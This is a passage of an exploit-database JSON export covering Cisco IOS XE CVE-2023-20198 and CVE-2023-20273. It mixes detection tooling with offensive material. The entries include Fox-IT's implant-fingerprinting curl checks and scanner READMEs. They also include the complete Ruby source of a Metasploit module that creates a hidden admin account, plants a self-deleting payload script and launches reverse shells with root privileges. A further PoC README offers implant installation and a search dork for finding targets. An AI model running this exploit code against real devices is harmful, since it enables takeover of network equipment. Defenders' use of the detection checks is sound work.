Cisco IOS XE Software Web Management User Interface mass exploitations. Cisco Talos [^1] published a fingerprint that could check if the implant was active on Cisco IOS XE devices. For reference:\n\n```shell\ncurl -k -X POST \"https://DEVICEIP/webui/logoutconfirm.html?logon_hash=1\"\n```\n\nIf the HTTP response consists of a hexadecimal string, this is a high-confidence indicator that the device is compromised. However, as multiple sources have mentioned [^2] [^3], the number of implants that can be discovered using this method has gone down significantly.\n\n## Upgraded Implant\n\nInvestigated network traffic to a compromised device has shown that the threat actor has upgraded the implant to do an extra header check.\nThus, for a lot of devices, the implant is still active, but now only responds if the correct `Authorization` HTTP header is set.\n\n## Alternate method for Cisco IOS XE implant scanning\n\nWe took another look at the [initial blogpost by Cisco Talos](https://blog.talosintelligence.com/active-exploitation-of-cisco-ios-xe-software/) and noticed an extra location check in the implant code:\n\n![implant-location-percent](implant-location-percent.png?raw=true \"Extra location check\")\n\nBased on the above screenshot of the implant code shared by Cisco Talos we found another method that can be used to fingerprint the presence of the implant.\n\n```shell\ncurl -k \"https://DEVICEIP/%25\"\n```\nUsing the `%25` (percent encoded percent), we meet the conditions specified in the extra location check. This will cause the server to respond with a different HTTP response than it normally would when the implant is not running.\n\nThere are currently three known versions of the implant. As of 1 November 2023, the implant is named `BadCandy` by Cisco Talos [^1].\n\n### BadCandy Implant v1 / v2 response\nA telltale of implant operation is a `<head><title>404 Not Found</title></head>` in the body. An example HTTP body is as such:\n\n```html\n$ curl -k 'https://DEVICEIP/%25'\n<html>\n<head><title>404 Not Found</title></head>\n<body bgcolor=\"white\">\n<center><h1>404 Not Found</h1></center>\n<hr><center>nginx</center>\n</body>\n</html>\n```\n\n### BadCandy Implant v3 response\nThe third variant returns the login page rather than the 404. As one would still normally expect a javascript redirect rather than this login page, we can still determine the presence of the implant by checking whether or not a login page is returned:\n\n```html\ncurl -k 'https://DEVICEIP/%25'\n<!DOCTYPE html>\n<html>\n <!--\n Copyright (c) 2015-2019 by Cisco Systems, Inc.\n All rights reserved.\n -->\n <head lang=\"en\">\n <meta charset=\"UTF-8\">\n <meta http-equiv=\"X-UA-Compatible\" content=\"IE=edge\">\n <title id=\"loginTitle\"></title>\n```\n\nWe found different login responses in our scanning results, and ended up with the `name=\"Username\"` string as an identifier to determine whether or not a login page is being returned.\n\n### Other responses\nIf the implant is not present, you will get a different response. For example:\n\n```html\n$ curl -k 'https://DEVICEIP/%25'\n<script>window.onload=function(){ url ='/webui';window.location.href=url;}</script>\n```\n\n## Script to check for compromise\n\nWe created a small script that checks for compromise using the above fingerprinting method. Script can be found here:\n\n * [iocisco.py](iocisco.py)\n\nExample usage:\n\n```shell\n$ pip3 install requests\n\n$ python3 iocisco.py 192.168.1.1\n[!] Checking http://192.168.1.1/%25\n WARNING: Possible implant found for 192.168.1.1 (impant v3)! Please perform a forensic investigation!\n[!] Checking https://192.168.1.1/%25\n WARNING: Possible implant found for 192.168.1.1 (implant v3)! Please perform a forensic investigation!\n```\n\nIt is also possible to scan a list of hosts, seperated by newlines.\n\n```shell\n$ python3 iocisco.py --file cisco-ips.txt\n```\n\n## References\n\n[^1]: https://blog.talosintelligence.com/active-exploitation-of-cisco-ios-xe-software/\n[^2]: https://www.bleepingcomputer.com/news/security/number-of-hacked-cisco-ios-xe-devices-plummets-from-50k-to-hundreds/\n[^3]: https://twitter.com/onyphe/status/1715633541264900217\n",
"modified": "2024-05-10T10:51:53",
"id": "450F4FED-7E81-533C-8064-4FED6D771D93",
"published": "2023-10-23T14:52:18",
"href": "https://github.com/fox-it/cisco-ios-xe-implant-detection",
"type": "githubexploit",
"title": "Exploit for Unprotected Alternate Channel in Cisco Ios Xe",
"cvss": {
"score": 10.0,
"severity": "CRITICAL",
"vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
"version": "3.1"
},
"vhref": "https://vulners.com/githubexploit/450F4FED-7E81-533C-8064-4FED6D771D93"
},
{
"lastseen": "2024-06-05T15:06:03",
"description": "This module leverages both CVE-2023-20198 and CVE-2023-20273 against vulnerable instances of Cisco IOS XE devices which have the Web UI exposed. An attacker can execute a payload with root privileges. The vulnerable IOS XE versions are: 16.1.1, 16.1.2, 16.1.3, 16.2.1, 16.2.2, 16.3.1, 16.3.2, 16.3.3, 16.3.1a, 16.3.4, 16.3.5, 16.3.5b, 16.3.6, 16.3.7, 16.3.8, 16.3.9, 16.3.10, 16.3.11, 16.4.1, 16.4.2, 16.4.3, 16.5.1, 16.5.1a, 16.5.1b, 16.5.2, 16.5.3, 16.6.1, 16.6.2, 16.6.3, 16.6.4, 16.6.5, 16.6.4s, 16.6.4a, 16.6.5a, 16.6.6, 16.6.5b, 16.6.7, 16.6.7a, 16.6.8, 16.6.9, 16.6.10, 16.7.1, 16.7.1a, 16.7.1b, 16.7.2, 16.7.3, 16.7.4, 16.8.1, 16.8.1a, 16.8.1b, 16.8.1s, 16.8.1c, 16.8.1d, 16.8.2, 16.8.1e, 16.8.3, 16.9.1, 16.9.2, 16.9.1a, 16.9.1b, 16.9.1s, 16.9.1c, 16.9.1d, 16.9.3, 16.9.2a, 16.9.2s, 16.9.3h, 16.9.4, 16.9.3s, 16.9.3a, 16.9.4c, 16.9.5, 16.9.5f, 16.9.6, 16.9.7, 16.9.8, 16.9.8a, 16.9.8b, 16.9.8c, 16.10.1, 16.10.1a, 16.10.1b, 16.10.1s, 16.10.1c, 16.10.1e, 16.10.1d, 16.10.2, 16.10.1f, 16.10.1g, 16.10.3, 16.11.1, 16.11.1a, 16.11.1b, 16.11.2, 16.11.1s, 16.11.1c, 16.12.1, 16.12.1s, 16.12.1a, 16.12.1c, 16.12.1w, 16.12.2, 16.12.1y, 16.12.2a, 16.12.3, 16.12.8, 16.12.2s, 16.12.1x, 16.12.1t, 16.12.2t, 16.12.4, 16.12.3s, 16.12.1z, 16.12.3a, 16.12.4a, 16.12.5, 16.12.6, 16.12.1z1, 16.12.5a, 16.12.5b, 16.12.1z2, 16.12.6a, 16.12.7, 16.12.9, 16.12.10, 17.1.1, 17.1.1a, 17.1.1s, 17.1.2, 17.1.1t, 17.1.3, 17.2.1, 17.2.1r, 17.2.1a, 17.2.1v, 17.2.2, 17.2.3, 17.3.1, 17.3.2, 17.3.3, 17.3.1a, 17.3.1w, 17.3.2a, 17.3.1x, 17.3.1z, 17.3.3a, 17.3.4, 17.3.5, 17.3.4a, 17.3.6, 17.3.4b, 17.3.4c, 17.3.5a, 17.3.5b, 17.3.7, 17.3.8, 17.4.1, 17.4.2, 17.4.1a, 17.4.1b, 17.4.1c, 17.4.2a, 17.5.1, 17.5.1a, 17.5.1b, 17.5.1c, 17.6.1, 17.6.2, 17.6.1w, 17.6.1a, 17.6.1x, 17.6.3, 17.6.1y, 17.6.1z, 17.6.3a, 17.6.4, 17.6.1z1, 17.6.5, 17.6.6, 17.7.1, 17.7.1a, 17.7.1b, 17.7.2, 17.10.1, 17.10.1a, 17.10.1b, 17.8.1, 17.8.1a, 17.9.1, 17.9.1w, 17.9.2, 17.9.1a, 17.9.1x, 17.9.1y, 17.9.3, 17.9.2a, 17.9.1x1, 17.9.3a, 17.9.4, 17.9.1y1, 17.11.1, 17.11.1a, 17.12.1, 17.12.1a, 17.11.99SW\n",
"published": "2023-11-06T17:12:40",
"type": "metasploit",
"title": "Cisco IOX XE Unauthenticated RCE Chain",
"bulletinFamily": "exploit",
"cvelist": [
"CVE-2023-20198",
"CVE-2023-20273"
],
"modified": "2024-04-15T03:06:50",
"id": "MSF:EXPLOIT-LINUX-MISC-CISCO_IOS_XE_RCE-",
"href": "https://www.rapid7.com/db/modules/exploit/linux/misc/cisco_ios_xe_rce/",
"sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HTTP::CiscoIosXe\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::Retry\n prepend Msf::Exploit::Remote::AutoCheck\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Cisco IOX XE Unauthenticated RCE Chain',\n 'Description' => %q{\n This module leverages both CVE-2023-20198 and CVE-2023-20273 against vulnerable instances of Cisco IOS XE\n devices which have the Web UI exposed. An attacker can execute a payload with root privileges.\n\n The vulnerable IOS XE versions are:\n 16.1.1, 16.1.2, 16.1.3, 16.2.1, 16.2.2, 16.3.1, 16.3.2, 16.3.3, 16.3.1a, 16.3.4,\n 16.3.5, 16.3.5b, 16.3.6, 16.3.7, 16.3.8, 16.3.9, 16.3.10, 16.3.11, 16.4.1, 16.4.2,\n 16.4.3, 16.5.1, 16.5.1a, 16.5.1b, 16.5.2, 16.5.3, 16.6.1, 16.6.2, 16.6.3, 16.6.4,\n 16.6.5, 16.6.4s, 16.6.4a, 16.6.5a, 16.6.6, 16.6.5b, 16.6.7, 16.6.7a, 16.6.8, 16.6.9,\n 16.6.10, 16.7.1, 16.7.1a, 16.7.1b, 16.7.2, 16.7.3, 16.7.4, 16.8.1, 16.8.1a, 16.8.1b,\n 16.8.1s, 16.8.1c, 16.8.1d, 16.8.2, 16.8.1e, 16.8.3, 16.9.1, 16.9.2, 16.9.1a, 16.9.1b,\n 16.9.1s, 16.9.1c, 16.9.1d, 16.9.3, 16.9.2a, 16.9.2s, 16.9.3h, 16.9.4, 16.9.3s, 16.9.3a,\n 16.9.4c, 16.9.5, 16.9.5f, 16.9.6, 16.9.7, 16.9.8, 16.9.8a, 16.9.8b, 16.9.8c, 16.10.1,\n 16.10.1a, 16.10.1b, 16.10.1s, 16.10.1c, 16.10.1e, 16.10.1d, 16.10.2, 16.10.1f, 16.10.1g,\n 16.10.3, 16.11.1, 16.11.1a, 16.11.1b, 16.11.2, 16.11.1s, 16.11.1c, 16.12.1, 16.12.1s,\n 16.12.1a, 16.12.1c, 16.12.1w, 16.12.2, 16.12.1y, 16.12.2a, 16.12.3, 16.12.8, 16.12.2s,\n 16.12.1x, 16.12.1t, 16.12.2t, 16.12.4, 16.12.3s, 16.12.1z, 16.12.3a, 16.12.4a, 16.12.5,\n 16.12.6, 16.12.1z1, 16.12.5a, 16.12.5b, 16.12.1z2, 16.12.6a, 16.12.7, 16.12.9, 16.12.10,\n 17.1.1, 17.1.1a, 17.1.1s, 17.1.2, 17.1.1t, 17.1.3, 17.2.1, 17.2.1r, 17.2.1a, 17.2.1v,\n 17.2.2, 17.2.3, 17.3.1, 17.3.2, 17.3.3, 17.3.1a, 17.3.1w, 17.3.2a, 17.3.1x, 17.3.1z,\n 17.3.3a, 17.3.4, 17.3.5, 17.3.4a, 17.3.6, 17.3.4b, 17.3.4c, 17.3.5a, 17.3.5b, 17.3.7,\n 17.3.8, 17.4.1, 17.4.2, 17.4.1a, 17.4.1b, 17.4.1c, 17.4.2a, 17.5.1, 17.5.1a, 17.5.1b,\n 17.5.1c, 17.6.1, 17.6.2, 17.6.1w, 17.6.1a, 17.6.1x, 17.6.3, 17.6.1y, 17.6.1z, 17.6.3a,\n 17.6.4, 17.6.1z1, 17.6.5, 17.6.6, 17.7.1, 17.7.1a, 17.7.1b, 17.7.2, 17.10.1, 17.10.1a,\n 17.10.1b, 17.8.1, 17.8.1a, 17.9.1, 17.9.1w, 17.9.2, 17.9.1a, 17.9.1x, 17.9.1y, 17.9.3,\n 17.9.2a, 17.9.1x1, 17.9.3a, 17.9.4, 17.9.1y1, 17.11.1, 17.11.1a, 17.12.1, 17.12.1a,\n 17.11.99SW\n },\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'sfewer-r7', # MSF Exploit\n ],\n 'References' => [\n ['CVE', '2023-20198'],\n ['CVE', '2023-20273'],\n # Vendor advisories.\n ['URL', 'https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxe-webui-privesc-j22SaA4z'],\n ['URL', 'https://blog.talosintelligence.com/active-exploitation-of-cisco-ios-xe-software/'],\n # Vendor list of (205) vulnerable versions.\n ['URL', 'https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxe-webui-privesc-j22SaA4z/cvrf/cisco-sa-iosxe-webui-privesc-j22SaA4z_cvrf.xml'],\n # Technical details on CVE-2023-20198.\n ['URL', 'https://www.horizon3.ai/cisco-ios-xe-cve-2023-20198-theory-crafting/'],\n ['URL', 'https://www.horizon3.ai/cisco-ios-xe-cve-2023-20198-deep-dive-and-poc/'],\n # Technical details on CVE-2023-20273.\n ['URL', 'https://blog.leakix.net/2023/10/cisco-root-privesc/'],\n # Full details of a successful exploitation attempt from a honey pot.\n ['URL', 'https://gist.github.com/rashimo/a0ef01bc02e5e9fdf46bc4f3b5193cbf'],\n ],\n 'DisclosureDate' => '2023-10-16',\n 'Privileged' => true,\n 'Platform' => %w[linux unix],\n 'Arch' => [ARCH_CMD],\n 'Targets' => [\n [\n # Tested against IOS XE 16.12.3 and 17.3.2 with the following payloads:\n # cmd/linux/http/x64/meterpreter/reverse_tcp\n # cmd/linux/http/x64/shell/reverse_tcp\n # cmd/linux/http/x86/shell/reverse_tcp\n 'Linux Command',\n {\n 'Platform' => 'linux',\n 'Arch' => [ARCH_CMD]\n },\n ],\n [\n # Tested against IOS XE 16.12.3 and 17.3.2 with the following payloads:\n # cmd/unix/python/meterpreter/reverse_tcp\n # cmd/unix/reverse_bash\n 'Unix Command',\n {\n 'Platform' => 'unix',\n 'Arch' => [ARCH_CMD]\n },\n ]\n ],\n 'DefaultTarget' => 0,\n 'DefaultOptions' => {\n 'RPORT' => 443,\n 'SSL' => true\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS]\n }\n )\n )\n\n register_options(\n [\n # We allow a user to specify the VRF name to route traffic for the payloads network transport. The default of\n # 'global' should work, but exposing this as an option will allow for usage in more complex network setups.\n # A user could leverage the auxiliary module auxiliary/admin/http/cisco_ios_xe_cli_exec_cve_2023_20198 to\n # inspect a devices configuration to see an appropriate VRF to use.\n OptString.new('CISCO_VRF_NAME', [ true, \"The virtual routing and forwarding (vrf) name to use. Both 'fwd' or 'global' have been tested to work.\", 'global']),\n # We may need to try and execute a command a second time if it fails the first time. This option is the maximum\n # number of seconds to keep trying.\n OptInt.new('CISCO_CMD_TIMEOUT', [true, 'The maximum timeout (in seconds) to wait when trying to execute a command.', 30])\n ]\n )\n end\n\n def check\n # First, a get request to the root of the Web UI, this lets us verify the target is a Cisco IOS XE device with\n # the Web UI exposed (which is the vulnerable component).\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => normalize_uri('webui')\n )\n\n return CheckCode::Unknown('Connection failed') unless res\n\n # We look for one of two identifiers to ensure the request to /webui above returns something with Cisco in the content.\n if res.code != 200 || (!res.body.include?('Cisco Systems, Inc.') || !res.headers['Content-Security-Policy']&.include?('cisco.com'))\n return CheckCode::Unknown('Web UI not detected')\n end\n\n # By here we know the target is the IOS XE Web UI. We leverage the vulnerability to pull out the version number,\n # so if this request succeeds, then we known the target is vulnerable.\n res = run_cli_command('show version', Mode::PRIVILEGED_EXEC)\n\n # If the above request failed, then the target is safe.\n return CheckCode::Safe unless res\n\n version = 'Cisco IOS XE Software'\n\n # If we can pull out the version number via a regex, we do. If this fails, the target is still vulnerable\n # (as the above call to run_cli_command succeeded), however maybe this firmware version uses a different format\n # for the version information so our regex wont work.\n # Note: Version numbers can have letters in them, e.g. 17.11.99SW or 16.12.1z2\n if res =~ /(Cisco IOS XE Software, Version \\S+\\.\\S+\\.\\S+)/\n version = Regexp.last_match(1)\n end\n\n CheckCode::Vulnerable(version)\n end\n\n def exploit\n admin_username = rand_text_alpha(8)\n admin_password = rand_text_alpha(8)\n\n # Leverage CVE-2023-20198 to run an arbitrary CLI command and create a new admin user account.\n unless run_cli_command(\"username #{admin_username} privilege 15 secret #{admin_password}\", Mode::GLOBAL_CONFIGURATION)\n fail_with(Failure::UnexpectedReply, 'Failed to create admin user')\n end\n\n begin\n print_status(\"Created privilege 15 user '#{admin_username}' with password '#{admin_password}'\")\n\n # Leverage CVE-2023-20273 to run an arbitrary OS commands and bootstrap a Metasploit payload...\n\n # A shell script to execute the Metasploit payload. Will delete itself upon execution.\n bootstrap_script = \"#!/bin/sh\\nrm -f $0\\n#{payload.encoded}\"\n\n # The location of our bootstrap script.\n bootstrap_file = \"/tmp/#{Rex::Text.rand_text_alpha(8)}\"\n\n # NOTE: Rather than chaining the commands with a semicolon, we run them separately. This allows version 16.* and\n # 17.8 to work as expected. Version 16.* did not work when semi colons were present in the command line.\n\n # Write a script to disk which will execute the Metasploit payload. We base64 encode it to avoid any problems\n # with restricted chars, and leverage openssl to decode and write the contents to disk.\n success = retry_until_truthy(timeout: datastore['CISCO_CMD_TIMEOUT']) do\n next run_os_command(\"openssl enc -base64 -out #{bootstrap_file} -d <<< #{Base64.strict_encode64(bootstrap_script)}\", admin_username, admin_password)\n end\n\n unless success\n fail_with(Failure::UnexpectedReply, 'Failed to plant the bootstrap file')\n end\n\n # Make the script executable.\n success = retry_until_truthy(timeout: datastore['CISCO_CMD_TIMEOUT']) do\n next run_os_command(\"chmod +x #{bootstrap_file}\", admin_username, admin_password)\n end\n\n unless success\n fail_with(Failure::UnexpectedReply, 'Failed to chmod the bootstrap file')\n end\n\n # Execute our bootstrap script via mcp_chvrf.sh, and with 'global' virtual routing and forwarding (vrf) by\n # default. The VRF allows the executed script to route its network traffic back the framework. The map_chvrf.sh\n # scripts wraps a call to /usr/sbin/chvrf, which will conveniently fork the command we supply.\n success = retry_until_truthy(timeout: datastore['CISCO_CMD_TIMEOUT']) do\n next run_os_command(\"/usr/binos/conf/mcp_chvrf.sh #{datastore['CISCO_VRF_NAME']} sh #{bootstrap_file}\", admin_username, admin_password)\n end\n\n unless success\n fail_with(Failure::UnexpectedReply, 'Failed to execute the bootstrap file')\n end\n ensure\n print_status(\"Removing user '#{admin_username}'\")\n\n # Leverage CVE-2023-20198 to remove the admin account we previously created.\n unless run_cli_command(\"no username #{admin_username}\", Mode::GLOBAL_CONFIGURATION)\n print_warning('Failed to remove user')\n end\n end\n end\n\nend\n",
"cvss": {
"score": 10.0,
"severity": "CRITICAL",
"vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
"version": "3.1"
},
"sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/misc/cisco_ios_xe_rce.rb",
"vhref": "https://vulners.com/metasploit/MSF:EXPLOIT-LINUX-MISC-CISCO_IOS_XE_RCE-"
},
{
"lastseen": "2024-06-05T17:45:07",
"bulletinFamily": "exploit",
"cvelist": [
"CVE-2023-20198"
],
"description": "# CVE-2023-20198\nCVE-2023-20198 Checkscript based on: https://blog.talosintelligence.com/active-exploitation-of-cisco-ios-xe-software/\nIncluding the updated where there is an Authorization header to check for the known implant. \n\n!! Upgraded to look for upgraded implant \n\n\n\nThe script checks length of returned response with code 200, and checks if length is shorter then 32 characters. Each IP returning shorter length than 32 chars should be checked to se if device is compromised. This script *only* gives you an indicator, not proof that the device is compromised.\n\nThe script also checks if the implant has been upgraded, as dicovered by Fox-IT: https://github.com/fox-it/cisco-ios-xe-implant-detection\n\n\nRun:\n\n```\npython cve-2023-20198.py\n\n\nand enter you desired subnet to scan. For example:\n\npython CVE-2023-20198\n\n\nEnter the subnet (CIDR notation): 10.0.0.0/22\n\nIP: 10.0.0.94 - Error: no reply\n\nIP: 10.0.0.94 - Error: no reply\n\nIP: 10.0.0.96 - Status: 200\n\nIP: 10.0.0.96 - Response is a potentially suspicious: \n\n\nIPs with status code 200, suspicious length, should be checked:\n\n['10.0.0.96']\n\nIPs with status code 200, but no IOC:\n\n[]\n```\n",
"modified": "2024-04-01T11:30:40",
"id": "6D32CD31-2C1D-55F0-B50B-6833D29C48AF",
"published": "2023-10-17T08:00:18",
"href": "https://github.com/Atea-Redteam/CVE-2023-20198",
"type": "githubexploit",
"title": "Exploit for Unprotected Alternate Channel in Cisco Ios Xe",
"cvss": {
"score": 10.0,
"severity": "CRITICAL",
"vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
"version": "3.1"
},
"vhref": "https://vulners.com/githubexploit/6D32CD31-2C1D-55F0-B50B-6833D29C48AF"
},
{
"lastseen": "2024-06-05T17:44:43",
"bulletinFamily": "exploit",
"cvelist": [
"CVE-2023-20198"
],
"description": "# CVE 2023-20198\n<img width=\"518\" alt=\"Screenshot 2023-10-23 234005\" src=\"https://github.com/Pushkarup/CVE-2023-20198/assets/148672587/f14ad83f-0758-4cca-8a5b-f851112c2ae4\">\n\n## Introduction\nThe web UI component of Cisco IOS XE Software has a previously undiscovered vulnerability that, when exposed to the internet or untrusted networks, is already being actively exploited, according to Cisco. Due to this vulnerability, a remote, unauthenticated attacker is able to set up an account with privilege level 15 access on a vulnerable system. Afterward, the attacker can take control of the compromised machine using that account.\n\nCVE-2023-20198 is a privilege escalation vulnerability affecting Cisco IOS XE software, receiving the highest possible CVSS score of 10. Successful exploitation of this vulnerability would allow an attacker to create a user account with full administrative privileges.\n\n## Disclaimer: Educational Purpose Only\n\nThis Proof of Concept (PoC) is presented solely for educational and informational purposes. The intent behind sharing this PoC is to demonstrate potential vulnerabilities in a controlled environment. The goal is to promote understanding of cybersecurity concepts and encourage responsible disclosure.\n\n### Important Points:\n- **Ethical Use:** This PoC should only be used in environments and systems where you have explicit authorization. Unauthorized access to computer systems is illegal and unethical.\n- **Responsible Disclosure:** If you discover vulnerabilities as a result of this PoC, it is strongly recommended to report them responsibly to the relevant parties, allowing them adequate time to address and mitigate the issues.\n- **No Endorsement:** This PoC and related materials do not endorse or encourage any form of unauthorized access, hacking, or any other illegal activities.\n\nBy accessing and using this PoC, you acknowledge that you are solely responsible for your actions and agree to use this information in compliance with applicable laws and regulations. The author assumes no liability for any misuse or consequences arising from the use of this PoC for any purpose other than education and responsible disclosure.\n\n## Features\n\n- **User Creation:** Demonstrates the creation of a local user account on a target web application.\n- **Implant Installation:** Installs an implant configuration on the target web application.\n- **Web Server Restart:** Restarts the web server on the target to activate the implant.\n- **Implant Status Check:** Checks the status of the implanted code on the target.\n\n## Getting Started\n\n### Prerequisites\n\n- Python 3.x\n- Required Python packages: `requests`, `colorama`\n\n### Installation\n\n1. Clone the repository:\n\n ```bash\n git clone https://github.com/Pushkarup/CVE-2023-20198.git\n cd CVE-2023-20198\n ```\n\n2. Install the required Python packages:\n\n ```bash\n pip install colorama\n pip install requests\n ```\n\n## Usage\n\n\n1. Create a text file containing the target sites (one per line) and save it with a `.txt` extension.\n \u2022Collect site list for test using dork `labels='cisco-xe-webui'`\n\n2. Edit the Variable config_content in line 121 according to your need . Below is a sample config\n ```python\n config_content = \"\"\"\n #This is a sample configuration content\n param1: value1\n param2: value2\n nested_params:\n nested_param1: nested_value1\n nested_param2: nested_value2\n \"\"\"\n ```\n\n3. Run the script:\n\n ```bash\n python main.py\n ```\n\n4. Follow the prompts to process the target sites.\n\n## Contributing\n\nContributions are welcome! If you find any issues or have improvements, feel free to open a pull request or create an issue.\n\n## License\n\nThis project is licensed under the [MIT License](LICENSE).\n\n\n## Contact\n\n- GitHub: [Pushkar Upadhyay](https://github.com/Pushkarup)\n- LinkedIn: [Pushkar Upadhyay](www.linkedin.com/in/pushkar-upadhyay-24p)\n\n## Donations\n### Show your support\n- BTC: 3QqVBBzDBezA9U77PCTwMPQVGb1eecv2SP\n- ETH: 0xB779767483831BD98327A449C78FfccE2cc6df0a\n- USDT: 0xB779767483831BD98327A449C78FfccE2cc6df0a\n",
"modified": "2024-02-12T20:11:46",
"id": "AA1E22FF-1D43-5A38-ABAB-A17B2738EF68",
"published": "2023-10-23T16:04:23",
"href": "https://github.com/Pushkarup/CVE-2023-20198",
"type": "githubexploit",
"title": "Exploit for Unprotected Alternate Channel in Cisco Ios Xe",
"cvss": {
"score": 10.0,
"severity": "CRITICAL",
"vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
"version": "3.1"
},
"vhref": "https://vulners.com/githubexploit/AA1E22FF-1D43-5A38-ABAB-A17B2738EF68"
},
{
"lastseen": "2024-08-10T13:39:33",
"bulletinFamily": "exploit",
"cvelist": [
"CVE-2023-20198",
"CVE-2023-20273"
],
"description": "\n# Cisco IOS XE Device Scanner User Guide for CVE-2023-20198-Scanner\n\nThis is a webshell fingerprinting scanner designed to identify implants on Cisco IOS XE WebUI's affected by CVE-2023-20198 and CVE-2023-20273. This Python script checks for compromised Cisco IOS XE devices by making HTTP and HTTPS requests. It supports multiple ways to specify target IPs and provides threading for faster scanning.\n\n## ChangeLog\n- Added new Authentication NGINX Configuration file from [Talos Security's blog](https://blog.talosintelligence.com/active-exploitation-of-cisco-ios-xe-software/)\n- Added [Explainer for configuration LUA script functionality](https://github.com/Shadow0ps/CVE-2023-20198-Scanner/blob/main/Exploitation_Explainer.md).\n- Added CURL from Talos Blog along with Authorization HEX value provided by Talos Security.\n\n\nA few things you can do with this scipt:\n\n- [Scan a Single IP](https://github.com/Shadow0ps/CVE-2023-20198-Scanner/blob/main/README.md#--ip)\n- [Scan a list of IP's (Provide a file with each IP on a new line and pass it via argument)](https://github.com/Shadow0ps/CVE-2023-20198-Scanner/blob/main/README.md#--target_file)\n- [Scan a CIDR range](https://github.com/Shadow0ps/CVE-2023-20198-Scanner/blob/main/README.md#--cidr)\n- [Specify a custom UserAgent](https://github.com/Shadow0ps/CVE-2023-20198-Scanner/blob/main/README.md#--user_agent)\n- Specify new IOC's within the response.text using a file (IOCS.txt is the default file. Ensure each IOC is on a new line.) *Known IOCS will be updated regularly should new ones become known. All current IOC's are already implemented directly into the code for clarity.\n- [Ability to specify a proxy for scans](https://github.com/Shadow0ps/CVE-2023-20198-Scanner/blob/main/README.md#--proxy)\n- Concurrent Processing for speed and efficiency.\n- [Rate Limiting](https://github.com/Shadow0ps/CVE-2023-20198-Scanner/blob/main/README.md#--rate_limit)\n- Logging of compromised hosts.\n- Visual indication of potentially compromised hosts vs \"clean\" hosts. - This is not a guarantee and is based strictly off the known IOC's.\n\n## Requirements\n\n- Python 3.x\n- Required Python packages: `requests`, `termcolor`, `tqdm`\n\nInstall the required Python packages using pip if you haven't already:\n\n```bash\npip install requests termcolor tqdm\n```\n\n## Usage\n\nThe script provides several command-line options for flexibility:\n\n### `--target_file`\n\nSpecify a file containing a list of Cisco IOS XE Device IPs or hostnames. The IPs or hostnames should be listed one per line.\n\nExample:\n\n```bash\npython iosxe-scanner.py --target_file targets.txt\n```\n\n### `--cidr`\n\nSpecify a CIDR range to scan. The script will generate all the IPs in the specified range and scan them.\n\nExample:\n\n```bash\npython iosxe-scanner.py --cidr 192.168.1.0/24\n```\n\n### `--ip`\n\nSpecify a single IP to scan.\n\nExample:\n\n```bash\npython iosxe-scanner.py --ip 192.168.1.1\n```\n\n### `--user_agent`\n\nSet a custom User-Agent header for the HTTP requests. The default is `CISCO-IOS-Shell-Scanner-cisco-sa-iosxe-webui-privesc-j22SaA4z`.\n\nExample:\n\n```bash\npython iosxe-scanner.py --user_agent \"MyCustomUserAgent\"\n```\n\n### `--rate_limit`\n\nSet a rate limit in seconds between requests. The default is 1 second.\n\nExample:\n\n```bash\npython iosxe-scanner.py --rate_limit 0.5\n```\n\n### `--proxy`\n\nSpecify an HTTP Proxy to use for requests.\n\nExample:\n\n```bash\npython iosxe-scanner.py --proxy http://127.0.0.1:8080\n```\n\n### `--iocs_file`\n\nSpecify a file containing Indicators of Compromise (IoCs) to look for in the response text. The default is `IOCS.txt`.\n\nExample:\n\n```bash\npython iosxe-scanner.py --iocs_file custom_iocs.txt\n```\n\n## Examples\n\n### Scan a list of targets from a file with a rate limit of 0.5 seconds\n\n```bash\npython iosxe-scanner.py --target_file targets.txt --rate_limit 0.5\n```\n\n### Scan a CIDR range using a proxy\n\n```bash\npython iosxe-scanner.py --cidr 192.168.1.0/24 --proxy http://127.0.0.1:8080\n```\n\n### Scan a single IP with a custom User-Agent\n\n```bash\npython iosxe-scanner.py --ip 192.168.1.1 --user_agent \"MyCustomUserAgent\"\n```\n\n### Scan using a custom IoCs file\n\n```bash\npython iosxe-scanner.py --iocs_file custom_iocs.txt\n```\n\n## Notes\n\n- This script disables SSL certificate verification for making HTTPS requests. Use this feature cautiously.\n- This script is presented \"As Is\" with NO WARRANTY. USE AT YOUR OWN RISK!\n- Use of this script may be illegal in your country or jurisdiction. While it only makes simple HTTP(S) requests and checks for specific responses it's up to you to determine whether or not its use is legal/ethical and appropriate. DONT BE A JERK.\n\nIf you find this script useful feel free to let me know or give me a follow on Twitter(\ud835\udd4f) <https://twitter.com/shadow0pz>\n",
"modified": "2024-02-05T20:58:16",
"id": "CB42FC0F-D167-5773-B706-F71EE1103B8A",
"published": "2023-10-23T19:25:29",
"href": "https://github.com/Shadow0ps/CVE-2023-20198-Scanner",
"type": "githubexploit",
"title": "Exploit for Unprotected Alternate Channel in Cisco Ios Xe",
"cvss": {
"score": 10.0,
"severity": "CRITICAL",
"vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
"version": "3.1"
},
"vhref": "https://vulners.com/githubexploit/CB42FC0F-D167-5773-B706-F71EE1103B8A"
},
{
"lastseen": "2024-06-05T17:42:26",
"bulletinFamily": "exploit",
"cvelist": [
"CVE-2023-20198"
],
